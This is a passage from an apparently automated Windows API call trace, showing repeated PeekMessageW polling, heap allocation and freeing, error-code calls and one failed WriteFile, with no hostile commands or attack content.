lpMsg=0x7df984) returned 0 [0257.597] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.597] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.597] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.597] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.597] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc3d620 | out: hHeap=0xbc0000) returned 1 [0257.597] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.597] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.598] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.598] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.598] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.598] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.598] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.598] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.598] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.598] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.598] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.598] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.598] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.598] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.598] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.598] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.598] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.598] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.598] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.598] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.598] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.598] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.599] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.599] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.599] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.599] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.599] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.599] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc3d620 | out: hHeap=0xbc0000) returned 1 [0257.599] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.599] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.599] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.599] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.599] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.599] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.599] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.599] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.599] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.599] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.599] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.599] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.599] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.599] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.600] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.600] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.600] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.600] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.600] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.600] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.600] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.600] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.600] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.600] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.600] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.600] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.600] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.600] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc3d620 | out: hHeap=0xbc0000) returned 1 [0257.600] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.600] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc3d5e0 | out: hHeap=0xbc0000) returned 1 [0257.600] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.600] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.600] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.600] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.600] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.600] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.601] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.601] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.601] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.601] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.601] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.601] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.601] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.601] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.601] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.601] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.601] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.601] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.601] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.601] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.601] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.601] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.601] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.601] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.601] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.601] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.601] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.601] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.601] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.602] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.602] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.602] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.602] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.602] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.602] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.602] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.602] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.602] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.602] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.602] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.602] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.602] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.602] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.602] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.602] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.602] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.602] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.602] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.602] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.602] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.602] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.602] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.603] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.603] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.603] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.603] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.603] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.603] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.603] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.603] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.603] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.603] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.603] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.603] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.603] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.603] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.603] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.603] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc3d5e0 | out: hHeap=0xbc0000) returned 1 [0257.603] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.603] GetLastError () returned 0x6 [0257.603] SetLastError (dwErrCode=0x6) [0257.603] GetLastError () returned 0x6 [0257.603] SetLastError (dwErrCode=0x6) [0257.604] WriteFile (in: hFile=0xfffffffe, lpBuffer=0xc04290, nNumberOfBytesToWrite=0x22, lpNumberOfBytesWritten=0x7de0c8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x7de0c8, lpOverlapped=0x0) returned 0 [0257.604] GetLastError () returned 0x6 [0257.604] GetLastError () returned 0x6 [0257.604] SetLastError (dwErrCode=0x6) [0257.604] GetLastError () returned 0x6 [0257.604] SetLastError (dwErrCode=0x6) [0257.604] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcdf350 | out: hHeap=0xbc0000) returned 1 [0257.604] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b78 | out: hHeap=0xbc0000) returned 1 [0257.604] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc052b0 | out: hHeap=0xbc0000) returned 1 [0257.604] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018f8 | out: hHeap=0xbc0000) returned 1 [0257.604] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda600 | out: hHeap=0xbc0000) returned 1 [0257.604] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9af0 | out: hHeap=0xbc0000) returned 1 [0257.604] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe050 | out: hHeap=0xbc0000) returned 1 [0257.604] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0257.604] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc018f8 [0257.604] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b78 [0257.604] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x18) returned 0xc2d2f8 [0257.604] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc2d2f8 | out: hHeap=0xbc0000) returned 1 [0257.604] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b78 | out: hHeap=0xbc0000) returned 1 [0257.604] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018f8 | out: hHeap=0xbc0000) returned 1 [0257.604] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0257.604] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc018f8 [0257.604] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018f8 | out: hHeap=0xbc0000) returned 1 [0257.604] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0257.604] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc018f8 [0257.604] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe050 [0257.604] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9af0 [0257.604] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b78 [0257.604] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b78 | out: hHeap=0xbc0000) returned 1 [0257.605] QueryPerformanceCounter (in: lpPerformanceCount=0x7dfa28 | out: lpPerformanceCount=0x7dfa28*=18810035468) returned 1 [0257.605] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9af0 | out: hHeap=0xbc0000) returned 1 [0257.605] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe050 | out: hHeap=0xbc0000) returned 1 [0257.605] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018f8 | out: hHeap=0xbc0000) returned 1 [0257.605] PeekMessageW (in: 